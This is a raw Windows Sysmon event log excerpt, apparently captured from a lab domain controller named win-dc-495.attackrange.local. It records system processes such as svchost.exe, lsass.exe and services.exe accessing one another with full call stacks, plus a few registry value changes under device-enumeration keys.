13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.752{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.752{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.736{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.721{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.721{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.705{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.705{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.705{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 